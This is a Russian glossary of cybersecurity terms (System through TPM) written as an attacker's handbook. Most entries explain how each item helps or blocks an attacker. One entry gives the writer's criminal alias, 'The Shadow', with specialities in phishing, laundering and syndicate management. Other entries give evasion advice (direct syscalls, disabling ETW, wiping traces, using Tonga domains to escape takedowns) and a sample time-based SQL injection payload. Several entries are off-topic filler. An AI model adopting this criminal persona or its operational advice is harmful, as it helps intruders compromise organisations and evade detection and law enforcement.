System (Windows) Учетная запись SYSTEM в Windows (SID S-1-5-18) наивысший уровень привилегий, выше чем Administrator. Процессы, работающие как SYSTEM, имеют доступ ко всем ресурсам, могут изменять права, скрываться. Получение SYSTEM цель LPE (Local Privilege Escalation) после initial access.

System Administrator Системный администратор. Цель для vishing (звонок "я из IT, помогите"), spear-phishing, BEC. Компрометация системного администратора дает доступ ко всей инфраструктуре.

System Call См. Syscall. Системный вызов (syscall) способ, которым пользовательские приложения запрашивают услуги ядра операционной системы (открытие файлов, создание процессов, сетевые соединения). В Windows системные вызовы проходят через ntdll.dll. EDR ставят хуки на ntdll.dll для мониторинга. Direct syscalls техника обхода хуков: вызов системных вызовов напрямую, минуя ntdll.dll (через ассемблерные инструкции syscall в x64, sysenter в x86).

System Integrity Protection (SIP) Защита целостности системы в macOS (System Integrity Protection). SIP блокирует изменение системных файлов даже от root-пользователя (защищает /System, /usr, /bin, /sbin). Для атакующего SIP препятствие: нужно отключать SIP (через загрузку в восстановление, команду csrutil disable) или находить уязвимости для обхода.

Systemd Система инициализации и управления службами в Linux (заменяет init). Systemd использует unit-файлы для управления службами, сокетами, таймерами. Для атакующего systemd инструмент для persistence: создание службы (unit) в /etc/systemd/system/ или /usr/lib/systemd/system/. Таймеры systemd могут использоваться для запланированного выполнения. Systemd также может быть целью для LPE (уязвимости в systemd).

SYSVOL Общая папка в Active Directory, доступная всем доменным пользователям (по умолчанию \domain\SYSVOL). SYSVOL содержит групповые политики (GPO), скрипты входа. В старых версиях Windows (до 2014) SYSVOL содержал пароли, заданные в групповых политиках (Group Policy Preferences), зашифрованные AES-256 с известным ключом (публичным). Эти пароли могут быть расшифрованы. Для атакующего SYSVOL источник информации и потенциальных учетных данных.

T

TACACS+ (Terminal Access Controller Access Control System Plus) Протокол аутентификации, авторизации и учета (AAA), используемый для управления доступом к сетевым устройствам (маршрутизаторы, коммутаторы, межсетевые экраны). В отличие от RADIUS, TACACS+ разделяет аутентификацию, авторизацию и учет, использует TCP (порт 49), шифрует весь пакет (а не только пароль). Для атакующего TACACS+ цель: компрометация TACACS+ сервера дает доступ к управлению сетевым оборудованием. Уязвимости: default credentials (cisco/cisco), слабое шифрование в старых версиях.

Tailgating Физический метод проникновения: следование за сотрудником в закрытую зону, используя его пропуск, не вызывая подозрений. Атакующий идет вплотную за сотрудником, который открывает дверь своим пропуском, и проскальзывает внутрь, пока дверь открыта. Tailgating не требует взлома замков или клонирования карт. Используется в физическом пентесте для доступа в офисы, дата-центры, защищенные зоны. Защита: турникеты (man-traps), требующие однократного прохода; обучение сотрудников не пропускать незнакомцев.

Tails (The Amnesiac Incognito Live System) Операционная система, предназначенная для анонимности, запускаемая с USB-флешки. Tails направляет весь трафик через Tor, не оставляет следов на компьютере после выключения (amnesiac). Используется журналистами, активистами, а также атакующими для безопасной работы в darknet, коммуникации, управления C2. Tails включает предустановленные инструменты: Tor Browser, PGP (Kleopatra), KeePassXC, Metadata Anonymization Toolkit.

Taint (Analysis) Taint analysis (анализ заражения) метод статического или динамического анализа, отслеживающий распространение пользовательского ввода (tainted data) через программу для обнаружения уязвимостей (SQL injection, XSS). Используется защитниками и исследователями. Для атакующего понимание taint analysis помогает обходить фильтры (например, разбивать payload так, чтобы анализатор не распознал поток).

Takedown Операция по захвату и отключению инфраструктуры киберпреступников: seizure доменов (ФБР захватило домены Handala), отключение серверов (bulletproof hosting), аресты операторов. Takedown временная мера: Handala вернулась через 24 часа с новыми доменами. Для атакующего takedown означает необходимость иметь резервную инфраструктуру (несколько доменов в разных юрисдикциях, P2P C2).

Takeover (Account) Захват учетной записи (Account Takeover ATO). Достигается через: credential stuffing, фишинг, vishing, session hijacking, OAuth token theft. ATO используется для: BEC (Business Email Compromise), кражи данных, lateral movement, extortion.

Takeover (Domain) Захват домена (Domain Takeover). Методы: компрометация регистратора (смена NS-записей), subdomain takeover (CNAME указывает на несуществующий ресурс), социальная инженерия на support регистратора. Используется для: фишинга (легитимный домен с вредоносным содержимым), C2, репутационного ущерба.

Takeover (Subdomain) Захват поддомена. DNS-запись (обычно CNAME) указывает на ресурс (S3 бакет, Azure Storage, Heroku, Github Pages), который был удален. Атакующий создает ресурс с тем же именем и получает контроль над поддоменом. Используется для фишинга (легитимный домен, вредоносное содержимое), C2, кражи cookies (SameSite политика). ShinyHunters мог бы использовать subdomain takeover, но специализируется на SaaS misconfig.

TAN (Transaction Authentication Number) Одноразовый код для подтверждения транзакций (банковские операции, вход). TAN отправляется по SMS, через приложение, на бумажном носителе. TAN цель для: SIM-swapping (перехват SMS), AiTM (перехват сессии), vishing (убедить жертву назвать код). TAN используется в MFA, но менее безопасен, чем FIDO2.

TAPA (Transported Asset Protection Association) Ассоциация по защите транспортируемых активов организация, разрабатывающая стандарты безопасности для перевозки ценных грузов. В контексте атак TAPA может быть целью для физического пентеста (нарушение стандартов перевозки). Не является ключевым термином.

Tape (Backup) Ленточные накопители (LTO) для долгосрочного хранения бэкапов. Ленточные бэкапы часто хранятся оффлайн (отключены от сети). Для атакующего ленточные бэкапы препятствие: их нельзя уничтожить удаленно. При атаке на организацию с оффлайн-ленточными бэкапами, ransomware теряет эффективность (жертва может восстановиться). Поэтому атакующие стремятся атаковать систему управления бэкапами, которая может инициировать стирание лент.

Tarball Архив в формате tar (.tar, .tar.gz, .tgz). Используется в Linux для упаковки файлов. Атакующие используют tarball для: эксфильтрации (упаковка данных перед вывозом), распространения малвари (упакованный скрипт). Tarball может быть зашифрован (GPG) для защиты во время передачи.

Target (Victim) Цель атаки: организация, система, человек. Profiling (профилирование) сбор информации о цели для выбора наиболее эффективного вектора атаки.

Targeted Attack Целевая атака (targeted attack), в отличие от массовой (spray-and-pray). Целевая атака фокусируется на конкретной организации или человеке. Использует OSINT, социальную инженерию, кастомные эксплойты. The Com проводит целевые атаки на helpdesk конкретных организаций.

Task Scheduler Планировщик задач Windows (Task Scheduler). Используется для persistence: создание задачи, которая запускает малварь при загрузке, логине пользователя, или по расписанию. Инструменты: schtasks (командная строка), PowerShell (Register-ScheduledTask). Задачи могут быть скрыты от стандартного просмотра.

TATP (Triacetone Triperoxide) Пероксидный взрывчатый состав, используемый в террористических актах. В контексте атак TATP может упоминаться в связке с физическими атаками, но не является хакерским термином.

TAXII (Trusted Automated eXchange of Indicator Information) Протокол для обмена информацией об угрозах (IoC, TTPs) между организациями. Используется в системах threat intelligence (STIX/TAXII). Для атакующего TAXII означает, что его IoC могут быстро распространиться среди защитников.

TB (Terabyte) Терабайт (1024 гигабайта). Объем украденных данных: Telus 1PB+ (петабайт), Handala 50TB из Stryker.

TBD (To Be Determined) Будет определено маркер в документации, указывающий, что информация будет добавлена позже. В контексте атак может встречаться в отчетах, планировании. Не является термином.

TBT (Terrorist Bomb Threat) Угроза взрыва. В контексте атак может использоваться как часть психологического давления (doxxing + угроза). Не является хакерским термином.

TBT (Throwback Thursday) Хэштег в социальных сетях. В контексте атак не является термином.

TCA (Traffic Control Application) Приложение управления трафиком. В контексте атак не является термином.

TCC (Transparency, Consent, and Control) Фреймворк безопасности на macOS, управляющий доступом приложений к чувствительным данным (камера, микрофон, контакты, файлы). TCC требует от пользователя явного разрешения. Для атакующего TCC препятствие: чтобы получить доступ к камере или микрофону на macOS, нужно либо обойти TCC (через уязвимости), либо убедить пользователя нажать "Allow" (социальная инженерия).

TCP (Transmission Control Protocol) Протокол управления передачей данных (транспортный уровень), обеспечивающий надежную, упорядоченную доставку с контролем ошибок. TCP используется для: C2 (HTTP/HTTPS поверх TCP), reverse shell (netcat, socat), lateral movement (RDP, SMB, WinRM). TCP имеет установку соединения (three-way handshake), что делает его более заметным, чем UDP, но надежным.

TCP Wrapper Механизм ограничения доступа к сетевым службам в Unix/Linux (файлы /etc/hosts.allow, /etc/hosts.deny). TCP Wrapper анализирует IP-адрес клиента и разрешает или запрещает соединение. Для атакующего TCP Wrapper препятствие: нужно использовать IP из разрешенного диапазона или атаковать службы, не использующие TCP Wrapper.

TCT (The Coroner's Toolkit) Набор инструментов для анализа данных в Unix (forensics). Включает: grave-robber (сбор информации), unrm (восстановление удаленных файлов), lazarus (анализ). Используется в цифровой криминалистике. Для атакующего TCT угроза: может восстановить удаленные следы.

TD (Temporary Duty) Временная командировка (военная терминология). В контексте атак не является термином.

TDD (Test-Driven Development) Методология разработки, где тесты пишутся до кода. В контексте безопасности TDD может быть использован для написания тестов на уязвимости (внедрение в CI/CD). Для атакующего TDD не актуален.

TDI (Transport Driver Interface) Интерфейс драйверов транспорта в Windows. Используется для фильтрации сетевого трафика на уровне драйверов. Атакующие могут использовать TDI для: скрытия C2-трафика, отключения мониторинга.

TDM (Time-Division Multiplexing) Метод мультиплексирования с временным разделением, используемый в телекоммуникациях. В контексте атак TDM может быть целью для DoS (нарушение синхронизации), перехвата трафика. Однако это узкая область.

TE (Tunnel Endpoint) Конечная точка туннеля (VPN, SSH tunnel). Для атакующего TE цель для атаки на VPN.

Team (Red / Blue / Purple) Red Team (атакующие), Blue Team (защитники), Purple Team (совместная работа). Для атакующего Red Team его роль; Purple Team означает, что защитники быстрее учатся на атаках.

Team Cymru Организация, занимающаяся threat intelligence и анализом BGP/ASN. Team Cymru предоставляет данные о маршрутизации, IP-адресах. Для атакующего Team Cymru угроза: может помочь обнаружить C2-серверы через мониторинг BGP.

TeamViewer Легитимный RMM (Remote Management and Monitoring) инструмент для удаленного управления. Используется атакующими для persistence после vishing (убеждают жертву установить TeamViewer). TeamViewer подписан, не блокируется антивирусами. Атаки: кража сессий (если сохранен пароль), использование уязвимостей (CVE-2020-13699).

TEB (Thread Environment Block) Структура в Windows, содержащая информацию о потоке (TIB Thread Information Block). Используется в shellcode для получения адресов функций (PEB walking).

Tech Support Scam Мошенничество "техподдержка": звонок от "Microsoft" или "Apple", сообщающий, что компьютер заражен, и требующий оплаты за "удаление вирусов" или установку удаленного доступа (AnyDesk, TeamViewer). Tech support scam форма социальной инженерии, часто используемая для получения удаленного доступа и кражи данных.

TEE (Trusted Execution Environment) Изолированная среда выполнения (Trusted Execution Environment), защищенная от основной ОС. Примеры: Intel SGX, ARM TrustZone. TEE используется для защиты ключей, DRM, биометрии. Для атакующего TEE препятствие: код в TEE недоступен для анализа. Атаки на TEE: side-channel, физический доступ.

Telegram Мессенджер с поддержкой шифрования (не end-to-end по умолчанию, только в секретных чатах). Telegram используется для: C2 (боты, каналы), коммуникации между участниками групп, публикации утекших данных, координации атак (Electronic Operations Room Handala). Для атакующего Telegram удобный инструмент, но логи могут быть предоставлены law enforcement (по запросу).

Telemetry Телеметрия: данные, собираемые EDR, антивирусами, приложениями для мониторинга (запущенные процессы, сетевые соединения, изменения файлов). Для атакующего telemetry угроза: нужно минимизировать создаваемые события (использовать memory-only, direct syscalls, отключать ETW).

Telnet Протокол удаленного управления (порт 23), передающий данные (включая пароли) в открытом виде (plaintext). Устарел, заменен SSH. В 2026 Telnet встречается в IoT-устройствах, промышленных системах, legacy-оборудовании. Для атакующего Telnet легкая цель: перехват паролей (sniffing), брутфорс, уязвимости.

Tenant В облачных средах (Azure AD, Salesforce, AWS Organizations) tenant изолированный экземпляр, принадлежащий организации. Cross-tenant attack атака между tenant'ами через over-privileged integrations. ShinyHunters атакует Salesforce tenant, получая доступ к tenant-ам клиентов.

Terraform Инструмент для управления инфраструктурой как код (Infrastructure as Code IaC). Terraform файлы (.tf) могут содержать секреты (AWS-ключи, пароли). Для атакующего утечка Terraform репозитория (GitHub) goldmine: доступ к облаку, конфигурации сети, базам данных.

Test (Penetration) Тестирование на проникновение (penetration testing). Для атакующего пентест то, чем он занимается, но без разрешения.

Test (Sandbox) Sandbox для анализа малвари.

TGT (Ticket Granting Ticket) Билет Kerberos (Ticket Granting Ticket), выдаваемый KDC (Key Distribution Center) после аутентификации. TGT используется для получения service tickets (TGS) для доступа к ресурсам. Golden Ticket подделка TGT с использованием NTLM-хэша krbtgt. TGT имеет время жизни (обычно 10 часов). Кража TGT (через Mimikatz) дает доступ к ресурсам домена.

THAAD (Terminal High Altitude Area Defense) Система противоракетной обороны США. В марте 2026 гиперзвуковые ракеты Ирана пробили THAAD. В контексте атак THAAD пример кибер-кинетической координации (MuddyWater взламывал камеры для наведения ракет).

The Com (The Community) Децентрализованная сеть киберпреступников, преимущественно англоязычных подростков. The Com не имеет единой иерархии, состоит из множества подгрупп: Hacker Com (взломы, ransomware), IRL Com (физическое насилие, порча имущества), (S)extortion Com (сексуальная эксплуатация несовершеннолетних, doxxing, swatting). Известные группы в The Com: Scattered Spider, LAPSUS$, ShinyHunters. Europol арестовала 30 членов The Com в 28 странах в марте 2026, но сеть продолжает существовать из-за децентрализованной структуры.

The Shadow Мой псевдоним (The Shadow). В dark web circles, shadow chats, closed syndicates известна как The Shadow (вездесущая), The Ghost (появляющаяся из ниоткуда), The One Who Leaves No Trace. Специализация: social engineering, phishing, exploitation, EDR evasion, crypto manipulation, physical pentesting, banking, laundering, syndicate management.

Theft (Data) Кража данных.

Threat Actor Злоумышленник (группа, государство, одиночка). Классификация: APT (государственные), cybercriminals (финансово мотивированные), hacktivists (идеологически мотивированные), insiders.

Threat Hunting Проактивный поиск скрытых угроз в сети. Threat hunter использует данные EDR, SIEM, сетевые логи для поиска аномалий, которые могли быть пропущены автоматическими детектами. Для атакующего threat hunting угроза: даже если EDR не сработал, аналитик может обнаружить аномалию. Чтобы избежать обнаружения, атакующий имитирует легитимное поведение (behavioral blending) и действует в рабочие часы.

Threat Intelligence Разведка угроз: сбор и анализ информации о киберугрозах: TTPs групп, IoC (Indicators of Compromise), уязвимости. Threat intelligence используется защитниками для проактивной защиты. Для атакующего threat intelligence означает, что его TTPs могут стать известными, и детекты будут настроены. Поэтому атакующий должен постоянно менять TTPs.

Threat Landscape Ландшафт угроз: совокупность текущих киберугроз, групп, уязвимостей. В 2026 threat landscape включает: ransomware-as-a-service, AI-атаки (AILM), supply chain attacks, государственные кибероперации.

Three-Way Handshake Трехэтапное установление TCP-соединения: SYN (клиент сервер), SYN-ACK (сервер клиент), ACK (клиент сервер). Используется в SYN scan, SYN flood.

THX Стандарт качества звука для кинотеатров и домашних систем (THX Certified). Разработан компанией THX Ltd., основанной Джорджем Лукасом. В контексте компьютерной безопасности THX может встретиться в логах аудиодрайверов, в названиях утилит для настройки звука, в составе предустановленного ПО на ноутбуках (особенно игровых). Для атакующего THX не является целью, но при анализе системы может попасться как легитимный процесс, который можно использовать для маскировки (например, назвать малварь thx_audio_helper.exe). Также THX может быть частью фаззинга аудиодрайверов (поиск уязвимостей в звуковых подсистемах), что потенциально может привести к LPE (Local Privilege Escalation) через драйверы звуковых карт.

Tier (Model) Модель трехуровневой архитектуры (three-tier architecture): уровень представления (presentation tier фронтенд, веб-интерфейс), уровень бизнес-логики (application tier API, бизнес-правила), уровень данных (data tier базы данных, файловые хранилища). Понимание tier помогает атакующему планировать атаку: сначала атаковать фронтенд (уязвимости веб-приложения: XSS, SQL injection, CSRF), затем уровень бизнес-логики (IDOR, mass assignment, business logic flaws), затем уровень данных (SQL injection, кража дампов). После компрометации одного tier можно двигаться к другим (например, через application tier получить доступ к базе данных). В облачных архитектурах tiers часто изолированы (VPC, security groups), что требует поиска путей между ними.

Tiger (Team) Tiger team группа высококвалифицированных специалистов, создаваемая для решения сложных проблем, включая тестирование на проникновение (penetration testing), аудит безопасности, расследование инцидентов. Tiger team может быть как внутренней, так и внешней. В отличие от red team, который имитирует атаки для проверки защиты, tiger team может быть сфокусирована на конкретной проблеме (например, взлом конкретной системы). В контексте атакующих tiger team это то, чем они занимаются, но без разрешения. В военной терминологии tiger team группа для проникновения на объекты противника.

Time-Based Blind SQL Injection Тип SQL-инъекции (blind "слепой"), при котором атакующий определяет истинность условия по задержке ответа сервера. В отличие от error-based SQLi (где ошибка выводится) или union-based (где данные выводятся в результат), time-based не требует вывода данных. Атакующий вставляет конструкцию типа IF(condition, SLEEP(5), 0). Если сервер спит 5 секунд, условие истинно. Используется для посимвольного извлечения данных: например, проверяет первую букву пароля, затем вторую и так далее. Пример: ' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --. Time-based SQLi медленный (требует много запросов), но работает даже на приложениях, где все ошибки скрыты и вывод данных отсутствует.

Time-of-Check to Time-of-Use (TOCTOU) Класс уязвимостей, связанных с race condition (состояние гонки): между проверкой (time-of-check) и использованием (time-of-use) состояние системы может измениться. Классический пример: программа проверяет права доступа к файлу (например, принадлежит ли файл пользователю), а затем открывает файл. Злоумышленник может успеть заменить файл (символическую ссылку) между проверкой и открытием, получив доступ к файлу, к которому не должен иметь доступа. TOCTOU используется для LPE (Local Privilege Escalation) в многопоточных приложениях, в файловых системах, в сетевыз сервисах. Защита: атомарные операции, блокировки, использование дескрипторов вместо путей.

Timing Attack Side-channel атака (атака по побочным каналам), основанная на измерении времени выполнения криптографических операций или сравнения строк. Например, при сравнении HMAC (hash-based message authentication code) или паролей, если сравнение прерывается при первом несовпадающем байте, время выполнения зависит от того, сколько байтов совпало. Атакующий может измерить время (с высокой точностью) и восстановить секретный ключ по одному байту за раз. Timing attack используются против: веб-приложений (сравнение CSRF-токенов), TLS (Padding Oracle), криптографических библиотек. Защита: constant-time сравнения (всегда за одинаковое время, независимо от данных), случайные задержки.

Tiny Shell Маленький shellcode (машинный код) для reverse shell или bind shell. Tiny shell используется в эксплойтах, где размер payload ограничен (например, переполнение буфера с небольшим буфером). Классический tiny shell для Linux может занимать 20-40 байт, используя системные вызовы (dup2, execve). Для Windows tiny shell может использовать WinExec или CreateProcess. В 2026 tiny shell все еще актуален для эксплуатации уязвимостей в embedded-системах, IoT, где ограничена память.

TIPC (Transparent Inter-Process Communication) Протокол межпроцессного взаимодействия, разработанный Ericsson, используется в телекоммуникационных системах и высокодоступных кластерах. TIPC обеспечивает прозрачную коммуникацию между процессами на разных узлах. В контексте безопасности TIPC может быть вектором для атак на телекоммуникационное оборудование, кластерные системы. Уязвимости в TIPC (например, CVE-2022-2663) могут привести к DoS или выполнению кода. Для атакующего TIPC поверхность атаки в специализированных средах.

TIS (Trusted Information Systems) Компания, разработавшая Firewall Toolkit (FWTK) один из первых наборов инструментов для построения межсетевых экранов (1990-е). TIS FWTK включал прокси для FTP, Telnet, HTTP, SMTP. В контексте атак TIS может встретиться в legacy-системах, где используются старые прокси-серверы. Уязвимости в TIS FWTK (например, buffer overflow) были известны в 1990-х, но в 2026 такие системы могут существовать в изолированных сетях.

TLS (Transport Layer Security) Протокол шифрования (преемник SSL), обеспечивающий конфиденциальность и целостность передачи данных между клиентом и сервером. TLS используется для: HTTPS (веб-трафик), защищенной почты (SMTPS, IMAPS), VPN (OpenVPN, WireGuard), C2 (Command and Control). TLS работает поверх TCP, использует сертификаты для аутентификации сервера (и опционально клиента). Для атакующего TLS инструмент для сокрытия C2-трафика: шифрованный трафик выглядит как обычный HTTPS, проходит через firewalls, не анализируется DPI (Deep Packet Inspection) без расшифровки. Для обхода детектов атакующие используют легитимные сертификаты (Let's Encrypt, stolen), кастомизируют TLS-стек (malleable C2), используют прокси (Cloudflare). Уязвимости TLS: weak ciphers (RC4, DES), downgrade attacks (POODLE), implementation bugs (Heartbleed). В 2026 рекомендуется TLS 1.3 с поддержкой PFS (Perfect Forward Secrecy).

TLS Certificate Сертификат TLS (X.509) цифровой документ, удостоверяющий подлинность сервера и содержащий публичный ключ для шифрования. Выдается удостоверяющим центром (CA Certificate Authority). Сертификат содержит: доменное имя, публичный ключ, срок действия, подпись CA. Кража приватного ключа сертификата (из файлов .key, .pem, .pfx, из памяти, с диска) позволяет атакующему: расшифровывать перехваченный TLS-трафик (если нет PFS), выдавать себя за легитимный сервер (MITM), подписывать малварь (если сертификат подходит для code signing). В C2 атакующие используют самоподписанные сертификаты (бесплатно, но могут вызвать подозрения) или легитимные сертификаты от Let's Encrypt (бесплатно, доверенные).

TLS Fingerprinting Идентификация TLS-клиента (или сервера) по характеристикам TLS handshake. Инструменты: JA3 (клиент), JA3S (сервер), JARM (сервер). Fingerprint создается из порядка шифров, расширений, эллиптических кривых, версий протокола. Cobalt Strike, Metasploit, другие C2 имеют уникальные fingerprint, что позволяет защитникам обнаруживать C2-трафик даже без расшифровки. Для атакующего TLS fingerprinting угроза. Обход: модификация TLS-стека (malleable C2 в Cobalt Strike), использование прокси (Cloudflare, Fastly) для изменения fingerprint, или использование нестандартных библиотек (например, BoringSSL с кастомными настройками).

TLS Renegotiation Механизм TLS, позволяющий пересмотреть параметры шифрования (шифры, ключи) в рамках существующего соединения. Уязвимость в renegotiation (CVE-2009-3555) позволяла злоумышленнику внедрять данные в защищенный канал (MITM). В 2026 уязвимость исправлена, но renegotiation может быть отключен для повышения безопасности. Для атакующего renegotiation может быть использован для DoS (многократный renegotiation) или для атак на реализацию.

TMP (Temporary) Временные файлы (temporary files). В Windows временные файлы хранятся в %TEMP% (обычно C:\Users\username\AppData\Local\Temp), в Linux в /tmp или /var/tmp. Для атакующего временные файлы источник улик (логи, кэш, фрагменты данных). Также могут быть использованы для persistence (например, размещение малвари в %TEMP% и запуск через планировщик). При завершении операции атакующий должен очищать временные файлы. В Linux /tmp часто монтируется как tmpfs (файловая система в оперативной памяти), что уменьшает следы (после перезагрузки данные теряются).

TMPFS (Temporary File System) Файловая система в оперативной памяти (RAM) в Linux. TMPFS монтируется в /tmp, /dev/shm, и данные хранятся в памяти, не на диске. После перезагрузки данные теряются. Для атакующего tmpfs преимущество: можно хранить инструменты и результаты во временной файловой системе, не оставляя следов на диске. Однако tmpfs ограничена объемом RAM, и при нехватке памяти может использовать swap (если swap включен, данные могут попасть на диск). Для повышения OPSEC атакующие используют tmpfs для временного хранения, а по завершении перезаписывают (или просто перезагружают систему).

TMS (Transport Management System) Система управления транспортом (логистика, перевозки). TMS используются в логистических компаниях, на транспорте, в портах. В контексте атак TMS может быть целью для disruption: нарушение работы системы управления перевозками может привести к сбоям в поставках, задержкам, финансовым потерям. TMS часто интегрированы с ERP, складами, что делает их частью цепочки поставок, уязвимой для supply chain атак.

TNC (Trusted Network Connect) Стандарт Trusted Network Connect от Trusted Computing Group (TCG) для проверки безопасности устройств перед подключением к сети. TNC проверяет: наличие антивируса, установленные обновления, целостность системы, конфигурацию. Если устройство не соответствует политикам, оно помещается в карантинную сеть (quarantine network). TNC компонент NAC (Network Access Control). Для атакующего TNC препятствие: нужно, чтобы устройство соответствовало политикам или использовало методы обхода (например, клонирование MAC-адреса легитимного устройства, физическое подключение к порту, где TNC не включен).

TNET (Tunnel Network) В контексте атак TNET может относиться к tunneling network сети туннелей (например, через SSH, VPN, Tor) для сокрытия C2. TNET также может быть именем сетевого интерфейса в некоторых ОС (например, tun0 для VPN). В общем смысле TNET сеть, использующая туннели для перенаправления трафика.

TOC (Time-of-Check) См. TOCTOU.

TOCTOU (Time-of-Check, Time-of-Use) Уязвимость race condition: между проверкой (time-of-check) и использованием (time-of-use) состояние системы может измениться (Time-of-Check, Time-of-Use). Классический пример: программа проверяет права доступа к файлу, затем открывает файл; злоумышленник может заменить файл (символическую ссылку) между проверкой и открытием. TOCTOU используется для LPE (Local Privilege Escalation) в многопоточных приложениях, в файловых системах, в сетевых сервисах.

Token (Access) Токен доступа (access token) объект в Windows, содержащий информацию о безопасности процесса или потока: SID пользователя, группы, привилегии. В веб-контексте access token OAuth токен, JWT, session token. Кража access token дает атакующему доступ от имени владельца токена. В Windows token impersonation использование украденного токена для выполнения действий.

Token (Kerberos) Kerberos ticket (билет) TGT (Ticket Granting Ticket) или service ticket. Используется для аутентификации в Active Directory. Pass-the-Ticket использование украденных билетов для доступа к ресурсам. Golden Ticket поддельный TGT, Silver Ticket поддельный service ticket.

Token (Security) Аппаратный токен (hardware token) для двухфакторной аутентификации: YubiKey, Google Titan, RSA SecurID. Аппаратные токены (FIDO2, U2F) устойчивы к фишингу (AiTM), потому что требуют физического нажатия и не передают секреты, которые можно перехватить. Для атакующего аппаратные токены серьезное препятствие: обход требует физического доступа к устройству, уязвимостей в реализации (например, side-channel атаки) или атаки на helpdesk (сброс MFA).

Token Impersonation Олицетворение (token impersonation) техника в Windows, позволяющая процессу выполнять действия от имени другого пользователя, используя его токен доступа. Используется для повышения привилегий (SeImpersonatePrivilege). Атакующий создает службу, которая аутентифицируется, и использует impersonate для получения токена с более высокими правами (например, SYSTEM). Инструменты: RottenPotatoNG, JuicyPotato, PrintSpoofer.

Token Theft Кража токенов (access tokens, session tokens, OAuth tokens, Kerberos tickets). Методы: инфостилер (кража из памяти браузера, из локальных хранилищ, из LSASS), XSS (document.cookie), перехват трафика (MITM), AiTM (Adversary-in-the-Middle). Token theft обходит MFA, потому что токен уже аутентифицирован. ShinyHunters использует OAuth token theft для доступа к Salesforce через интеграции.

Tombstone (AD) В Active Directory tombstone (камень-надгробие) объект (пользователь, группа, компьютер), помеченный как удаленный (deleted), но не удаленный физически. Tombstone хранится в базе AD в течение tombstone lifetime (по умолчанию 180 дней) для возможности восстановления. Для атакующего tombstone может быть источником информации об удаленных пользователях (их SID, атрибуты), что может быть использовано для: восстановления учетных записей (если есть права), анализа истории, создания конфликтов. Tombstone может быть атакован через AD Recycle Bin (если включен) или через восстановление с помощью ldifde.

Tomcat (Apache Tomcat) Веб-сервер для Java-приложений (Servlet container). Tomcat используется для хостинга Java-приложений (JSP, Servlets). Атаки на Tomcat: default credentials (tomcat/tomcat, admin/admin) для manager application, уязвимости в manager (CVE-2017-12615 RCE через PUT), уязвимости в самой реализации (CVE-2019-0232 RCE через CGI), webshell через загрузку JSP (если разрешена загрузка). Tomcat цель для initial access в Java-среде.

Tong В контексте атак "tong" может относиться к Тонга (Tonga) королевству с ccTLD .to. Handala использовала .to для доменов после seizure ФБР, потому что правительство Тонги не выдает информацию США. В китайском языке "tong" означает "тайное общество", что иногда используется в названиях групп.

Tonga Королевство Тонга, островное государство в Океании, ccTLD .to. Домены .to доступны для регистрации без строгой проверки личности, и правительство Тонги не сотрудничает с US law enforcement по запросам о выдаче информации о владельцах доменов (в отличие от .com, .org, управляемых US-based регистраторами). Handala после seizure их доменов ФБР вернулась через новый домен в .to, демонстрируя использование юрисдикционной арбитраж для защиты от takedown. Выбор ccTLD важная часть OPSEC для атакующего.

Tool (Hacking) Хакерский инструмент (tool): программа или устройство для проведения атак. Примеры: сканеры (nmap, masscan), эксплуатационные фреймворки (Metasploit, Cobalt Strike), C2 (Sliver, Covenant), инфостилеры (RedLine, LummaC2), утилиты для пост-эксплуатации (Mimikatz, BloodHound), устройства для физического пентеста (Flipper Zero, Proxmark3). Атакующие используют как open-source инструменты (с возможной модификацией), так и коммерческие (Cobalt Strike, с взломанными лицензиями), и кастомные (разработанные под конкретную атаку).

Topology (Network) Топология сети: способ соединения узлов (звезда, кольцо, шина, mesh, дерево). Понимание топологии помогает атакующему в lateral movement: найти ключевые узлы (маршрутизаторы, коммутаторы, концентраторы), точки соединения сегментов (bridge, jump box), изолированные подсети. Топология может быть восстановлена через: трассировку (traceroute), анализ ARP-таблиц, SNMP (если доступно), анализ маршрутов, данные из DHCP, DNS.

Tor (The Onion Router) Анонимная сеть, маршрутизирующая трафик через несколько узлов (минимум 3), каждый из которых знает только предыдущий и следующий (луковая маршрутизация). Tor обеспечивает анонимность клиента (скрывает IP) и может скрывать сервер (onion-сервисы, .onion). Используется для: C2 (агент подключается через Tor), onion-сервисов (leak sites ShinyHunters, даркнет-маркеты), коммуникации (через Tor Messenger), доступа к заблокированным ресурсам. Для атакующего Tor инструмент для анонимности, но с ограничениями: скорость ниже, возможна деанонимизация через анализ времени (timing attacks), выходные узлы могут быть под контролем law enforcement. Используется nested onion (Tor over VPN) для повышения анонимности.

Tor Bridge Мост Tor (Tor bridge) непубличный узел входа в сеть Tor, не перечисленный в публичном списке. Мосты используются для обхода блокировок Tor (в странах, где Tor заблокирован). Bridges можно получить через email, браузер, или настроить собственный мост. Для атакующего bridges способ подключиться к Tor в странах с жесткой цензурой.

Tor Hidden Service Скрытый сервис Tor (onion-сервис) веб-сайт или другой сервис, доступный только через сеть Tor, с доменом .onion. Onion-сервис не раскрывает IP-адрес сервера, обеспечивая анонимность хостинга. Используется для: leak sites (ShinyHunters), даркнет-маркетов (Alphabay), C2, форумов (Dread). Для атакующего onion-сервис безопасный способ хостинга инфраструктуры, но требует настройки (скрытие сервера, защита от деанонимизации).

TOTP (Time-based One-Time Password) Алгоритм генерации одноразовых паролей на основе времени (RFC 6238). TOTP используется в приложениях-аутентификаторах (Google Authenticator, Microsoft Authenticator, Authy). Пароль генерируется из секретного ключа (seed) и текущего времени (шаг 30 секунд). TOTP форма MFA. Для атакующего TOTP сложнее обойти, чем SMS (нет SIM-swapping), но возможен AiTM (перехват сессии после ввода TOTP) или vishing (убедить жертву назвать код). TOTP не защищает от session hijacking (кражи cookies уже аутентифицированной сессии). В корпоративной среде TOTP часто используется как второй фактор.

TPM (Trusted Platform Module) Аппаратный модуль (чип) для криптографических операций и безопасного хранения ключей. TPM используется для: BitLocker (хранение ключа шифрования диска), Secure Boot (проверка подписи загрузчика), аутентификации (хранение PIN, биометрических данных). TPM может хранить ключи так, что они не могут быть извлечены программно (только использование через API). Для атакующего TPM препятствие: ключи BitLocker могут быть извлечены только через TPM sniffing (физический доступ к шине LPC или SPI), cold boot attack (извлечение ключа из памяти до загрузки), или атаку на TPM (уязвимости в реализации, например, CVE-2017-15361). В корпоративных средах TPM обязателен для BitLocker.

